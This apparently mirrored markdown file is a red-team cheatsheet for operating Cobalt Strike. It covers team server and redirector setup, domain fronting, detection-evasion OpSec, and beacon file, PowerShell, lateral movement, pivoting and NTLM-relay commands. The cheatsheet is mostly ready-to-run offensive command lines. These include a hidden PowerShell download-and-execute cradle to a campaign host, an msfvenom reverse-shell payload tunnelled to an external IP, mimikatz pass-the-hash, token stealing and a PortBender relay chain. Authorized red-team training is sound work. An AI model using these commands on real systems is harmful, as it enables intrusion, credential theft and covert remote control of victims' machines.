daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

cobalt-strike.md (13439B)


      1 ---
      2 title: "Cobalt Strike"
      3 section: "Command & Control"
      4 sectionSlug: "command-control"
      5 sourcePath: "docs/command-control/cobalt-strike.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/command-control/cobalt-strike.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Cobalt Strike
     12 
     13 > Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity.
     14 
     15 ```powershell
     16 sudo apt-get update
     17 sudo apt-get install openjdk-11-jdk
     18 sudo apt install proxychains socat
     19 sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
     20 sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile]
     21 ./cobaltstrike
     22 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))" 
     23 ```
     24 
     25 ## Summary
     26 
     27 * [Infrastructure](#infrastructure)
     28     * [Redirectors](#redirectors)
     29     * [Domain fronting](#domain-fronting)
     30 * [OpSec](#opsec)
     31     * [Customer ID](#customer-id)
     32 * [Malleable C2](#malleable-c2)
     33 * [Files](#files)
     34 * [Powershell and .NET](#powershell-and-net)
     35     * [Powershell commabds](#powershell-commands)
     36     * [.NET remote execution](#net-remote-execution)
     37 * [Lateral Movement](#lateral-movement)
     38 * [VPN & Pivots](#vpn--pivots)
     39 * [Beacon Object Files](#beacon-object-files)
     40 * [NTLM Relaying via Cobalt Strike](#ntlm-relaying-via-cobalt-strike)
     41 * [References](#references)
     42 
     43 ## Infrastructure
     44 
     45 ### Redirectors
     46 
     47 ```powershell
     48 sudo apt install socat
     49 socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80
     50 ```
     51 
     52 ### Domain Fronting
     53 
     54 * New Listener > HTTP Host Header
     55 * Choose a domain in "Finance & Healthcare" sector
     56 
     57 ## OpSec
     58 
     59 **Don't**
     60 
     61 * Use default self-signed HTTPS certificate
     62 * Use default port (50050)
     63 * Use 0.0.0.0 DNS response
     64 * Metasploit compatibility, ask for a payload : `wget -U "Internet Explorer" http://127.0.0.1/vl6D`
     65 
     66 **Do**
     67 
     68 * Use a redirector (Apache, CDN, ...)
     69 * Firewall to only accept HTTP/S from the redirectors
     70 * Firewall 50050 and access via SSH tunnel
     71 * Edit default HTTP 404 page and Content type: text/plain
     72 * No staging `set hosts_stage` to `false` in Malleable C2
     73 * Use Malleable Profile to taylor your attack to specific actors
     74 
     75 ### Customer ID
     76 
     77 > The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.
     78 
     79 * The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
     80 * The trial has a Customer ID value of 0.
     81 * Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool
     82 
     83 ## Malleable C2
     84 
     85 List of Malleable Profiles hosted on Github
     86 
     87 * Cobalt Strike - Malleable C2 Profiles [xx0hcd/Malleable-C2-Profiles](https://github.com/xx0hcd/Malleable-C2-Profiles)
     88 * Cobalt Strike Malleable C2 Design and Reference Guide [threatexpress/malleable-c2](https://github.com/threatexpress/malleable-c2)
     89 * Malleable-C2-Profiles [rsmudge/Malleable-C2-Profiles](https://github.com/rsmudge/Malleable-C2-Profiles)
     90 * SourcePoint is a C2 profile generator [Tylous/SourcePoint](https://github.com/Tylous/SourcePoint)
     91 
     92 Example of syntax
     93 
     94 ```powershell
     95 set useragent "SOME AGENT"; # GOOD
     96 set useragent 'SOME AGENT'; # BAD
     97 prepend "This is an example;";
     98 
     99 # Escape Double quotes
    100 append "here is \"some\" stuff";
    101 # Escape Backslashes
    102 append "more \\ stuff";
    103 # Some special characters do not need escaping
    104 prepend "!@#$%^&*()";
    105 ```
    106 
    107 Check a profile with `./c2lint`.
    108 
    109 * A result of 0 is returned if c2lint completes with no errors
    110 * A result of 1 is returned if c2lint completes with only warnings
    111 * A result of 2 is returned if c2lint completes with only errors
    112 * A result of 3 is returned if c2lint completes with both errors and warning
    113 
    114 ## Files
    115 
    116 ```powershell
    117 # List the file on the specified directory
    118 beacon > ls <C:\Path>
    119 
    120 # Change into the specified working directory
    121 beacon > cd [directory]
    122 
    123 # Delete a file\folder
    124 beacon > rm [file\folder]
    125 
    126 # File copy
    127 beacon > cp [src] [dest]
    128 
    129 # Download a file from the path on the Beacon host
    130 beacon > download [C:\filePath]
    131 
    132 # Lists downloads in progress
    133 beacon > downloads
    134 
    135 # Cancel a download currently in progress
    136 beacon > cancel [*file*]
    137 
    138 # Upload a file from the attacker to the current Beacon host
    139 beacon > upload [/path/to/file]
    140 ```
    141 
    142 ## Powershell and .NET
    143 
    144 ### Powershell commands
    145 
    146 ```powershell
    147 # Import a Powershell .ps1 script from the control server and save it in memory in Beacon
    148 beacon > powershell-import [/path/to/script.ps1]
    149 
    150 # Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.
    151 beacon > powershell [commandlet][arguments]
    152 
    153 # Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto
    154 beacon > powerpick [commandlet] [argument]
    155 
    156 # Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs
    157 beacon > psinject [pid][arch] [commandlet] [arguments]
    158 ```
    159 
    160 ### .NET remote execution
    161 
    162 Run a local .NET executable as a Beacon post-exploitation job.
    163 
    164 Require:
    165 
    166 * Binaries compiled with the "Any CPU" configuration.
    167 
    168 ```powershell
    169 beacon > execute-assembly [/path/to/script.exe] [arguments]
    170 beacon > execute-assembly /home/audit/Rubeus.exe
    171 [*] Tasked beacon to run .NET program: Rubeus.exe
    172 [+] host called home, sent: 318507 bytes
    173 [+] received output:
    174 
    175    ______        _                      
    176   (_____ \      | |                     
    177    _____) )_   _| |__  _____ _   _  ___ 
    178   |  __  /| | | |  _ \| ___ | | | |/___)
    179   | |  \ \| |_| | |_) ) ____| |_| |___ |
    180   |_|   |_|____/|____/|_____)____/(___/
    181 
    182   v1.4.2 
    183 ```
    184 
    185 ## Lateral Movement
    186 
    187 :warning: OPSEC Advice: Use the **spawnto** command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe
    188 
    189 * **portscan:** Performs a portscan on a specific target.
    190 * **runas:** A wrapper of runas.exe, using credentials you can run a command as another user.
    191 * **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \
    192 :exclamation: This module needs Administrator privileges.
    193 * **steal_token:** Steal a token from a specified process.
    194 * **make_token:** By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
    195 * **jump:** Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. \
    196 :exclamation: The **jump** module will use the current delegation/impersonation token to authenticate on the remote target. \
    197 :muscle: We can combine the **jump** module with the **make_token** or **pth** module for a quick "jump" to another target on the network.
    198 * **remote-exec:** Execute a command on a remote target using psexec, winrm or wmi. \
    199 :exclamation: The **remote-exec** module will use the current delegation/impersonation token to authenticate on the remote target.
    200 * **ssh/ssh-key:** Authenticate using ssh with password or private key. Works for both linux and windows hosts.
    201 
    202 :warning: All the commands launch powershell.exe
    203 
    204 ```powershell
    205 Beacon Remote Exploits
    206 ======================
    207 jump [module] [target] [listener] 
    208 
    209     psexec x86 Use a service to run a Service EXE artifact
    210     psexec64 x64 Use a service to run a Service EXE artifact
    211     psexec_psh x86 Use a service to run a PowerShell one-liner
    212     winrm x86 Run a PowerShell script via WinRM
    213     winrm64 x64 Run a PowerShell script via WinRM
    214 
    215 Beacon Remote Execute Methods
    216 =============================
    217 remote-exec [module] [target] [command] 
    218 
    219     Methods                         Description
    220     -------                         -----------
    221     psexec                          Remote execute via Service Control Manager
    222     winrm                           Remote execute via WinRM (PowerShell)
    223     wmi                             Remote execute via WMI (PowerShell)
    224 
    225 ```
    226 
    227 Opsec safe Pass-the-Hash:
    228 
    229 1. `mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"`
    230 2. `steal_token PID`
    231 
    232 ### Assume Control of Artifact
    233 
    234 * Use `link` to connect to SMB Beacon
    235 * Use `connect` to connect to TCP Beacon
    236 
    237 ## VPN & Pivots
    238 
    239 :warning: Covert VPN doesn't work with W10, and requires Administrator access to deploy.
    240 
    241 > Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second.
    242 
    243 ```powershell
    244 # Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
    245 beacon > socks [PORT]
    246 beacon > socks [port]
    247 beacon > socks [port] [socks4]
    248 beacon > socks [port] [socks5]
    249 beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
    250 beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]
    251 
    252 # Proxy browser traffic through a specified Internet Explorer process.
    253 beacon > browserpivot [pid] [x86|x64]
    254 
    255 # Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
    256 beacon > rportfwd [bind port] [forward host] [forward port]
    257 
    258 # spunnel : Spawn an agent and create a reverse port forward tunnel to its controller.    ~=  rportfwd + shspawn.
    259 msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin
    260 beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin
    261 
    262 # spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller
    263 # then you can handle the connect back on your MSF multi handler
    264 beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin
    265 ```
    266 
    267 ## Beacon Object Files
    268 
    269 > A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs
    270 
    271 Example: <https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h>
    272 
    273 * Compile
    274 
    275     ```ps1
    276     # To compile this with Visual Studio:
    277     cl.exe /c /GS- hello.c /Fohello.o
    278 
    279     # To compile this with x86 MinGW:
    280     i686-w64-mingw32-gcc -c hello.c -o hello.o
    281 
    282     # To compile this with x64 MinGW:
    283     x86_64-w64-mingw32-gcc -c hello.c -o hello.o
    284     ```
    285 
    286 * Execute: `inline-execute /path/to/hello.o`
    287 
    288 ## NTLM Relaying via Cobalt Strike
    289 
    290 ```powershell
    291 beacon> socks 1080
    292 kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
    293 beacon> rportfwd_local 8445 <IP_KALI> 445
    294 beacon> upload C:\Tools\PortBender\WinDivert64.sys
    295 beacon> PortBender redirect 445 8445
    296 ```
    297 
    298 ## References
    299 
    300 * [Red Team Ops with Cobalt Strike (1 of 9): Operations](https://www.youtube.com/watch?v=q7VQeK533zI)
    301 * [Red Team Ops with Cobalt Strike (2 of 9): Infrastructure](https://www.youtube.com/watch?v=5gwEMocFkc0)
    302 * [Red Team Ops with Cobalt Strike (3 of 9): C2](https://www.youtube.com/watch?v=Z8n9bIPAIao)
    303 * [Red Team Ops with Cobalt Strike (4 of 9): Weaponization](https://www.youtube.com/watch?v=H0_CKdwbMRk)
    304 * [Red Team Ops with Cobalt Strike (5 of 9): Initial Access](https://www.youtube.com/watch?v=bYt85zm4YT8)
    305 * [Red Team Ops with Cobalt Strike (6 of 9): Post Exploitation](https://www.youtube.com/watch?v=Pb6yvcB2aYw)
    306 * [Red Team Ops with Cobalt Strike (7 of 9): Privilege Escalation](https://www.youtube.com/watch?v=lzwwVwmG0io)
    307 * [Red Team Ops with Cobalt Strike (8 of 9): Lateral Movement](https://www.youtube.com/watch?v=QF_6zFLmLn0)
    308 * [Red Team Ops with Cobalt Strike (9 of 9): Pivoting](https://www.youtube.com/watch?v=sP1HgUu7duU&list=PL9HO6M_MU2nfQ4kHSCzAQMqxQxH47d1no&index=10&t=0s)
    309 * [A Deep Dive into Cobalt Strike Malleable C2 - Joe Vest - Sep 5, 2018](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
    310 * [Cobalt Strike. Walkthrough for Red Teamers - Neil Lines - 15 Apr 2019](https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/)
    311 * [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/)
    312 * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon)
    313 * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/)
    314 * [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/)
    315 * [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm)
    316 * [Cobalt Strike 4.6 - User Guide PDF](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-6-user-guide.pdf)